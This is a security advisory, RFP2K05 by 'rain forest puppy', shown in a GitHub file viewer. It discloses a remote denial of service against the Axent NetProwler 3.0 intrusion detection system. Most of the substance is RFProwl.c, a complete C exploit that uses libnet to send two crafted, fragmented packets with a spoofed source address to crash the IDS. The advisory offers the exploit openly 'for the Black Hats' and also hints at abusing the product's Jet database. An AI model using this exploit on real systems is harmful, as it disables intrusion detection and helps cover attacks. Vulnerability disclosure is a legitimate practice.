-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathRFP2k05.txt
119 lines (72 loc) · 3.58 KB
/
RFP2k05.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /---------
NetProwler vs. RFProwler
Remote denial of service in Axent NetProwler
------------------------------------/ rain forest puppy / [email protected]
Table of contents:
-/ 1 / For the Black Hats
-/ 2 / For the White Hats
-/ 3 / OMG! Look! It's not Perl!
--/ 1 / For the Black Hats /----------------------------------------------
The attached demonstration dribbles two fragmented IP packets to an IP
address which is profiled by NetProwler IDS version 3.0. The result is
that NetProwler chokes, dropping into a lovely Dr. Watson error message.
Note that this was tested with an older version (3.0), since Axent hasn't
sent me an evaluation key (I requested it over 11 days ago) for the latest
version downloadable from the web. Also note that NetProwler needs to be
profiling the FTP service on the victim for this to be effective.
This was found using Dug Song/Anzen's awesome Fragrouter program.
http://www.anzen.com/research/nidsbench/
Also, NetProwler stores incoming alert information in a Jet .mdb. I
suggest you take a look at RFP2K04, and consider the implications. ;)
--/ 2 / For the White Hats /----------------------------------------------
As I mentioned above, this is for version 3.0. Axent was contacted on
Monday, but they never responded. So after a small 'industry-standard'
wait, I have chosen to release this.
--/ 3 / OMG! Look! It's not Perl! /---------------------------------------
/* RFProwl.c - rain forest puppy / wiretrip / [email protected]
Kills NetProwler IDS version 3.0
You need libnet installed. It's available from
www.packetfactory.net. Acks to route.
Only tested on RH 6.x Linux. To compile:
gcc RFProwl.c -lnet -o RFProwl
Plus, make sure your architecture is defined below: */
#define LIBNET_LIL_ENDIAN 1
#undef LIBNET_BIG_ENDIAN 1
#include <libnet.h>
/* it's just much easier to code in the packet frags we want. :) */
char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";
int main(int argc, char **argv) {
int sock, c;
u_long src_ip, dst_ip;
printf("RFProwl - rain forest puppy / wiretrip\n");
if(argc<3){
printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
exit(EXIT_FAILURE);}
dst_ip=inet_addr(argv[1]);
src_ip=inet_addr(argv[2]);
memcpy(pack1+16,&dst_ip,4);
memcpy(pack2+16,&dst_ip,4);
memcpy(pack1+12,&src_ip,4);
memcpy(pack2+12,&src_ip,4);
sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1){
perror("Socket problems: ");
exit(EXIT_FAILURE);}
c = write_ip(sock, pack1, 46);
if (c < 46) printf("Write_ip #1 choked\n");
c = write_ip(sock, pack2, 46);
if (c < 46) printf("Write_ip #2 choked\n");
printf("Packets sent\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}
----/ acks /--------------------------------------------------------------
eEye, Attrition, w00w00, ADM, Technotronic, USSR, Packetfactory.net
------------------------------------/ rain forest puppy / [email protected]
Since when has TUCOWS become a TLD registrar?!?
---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /---------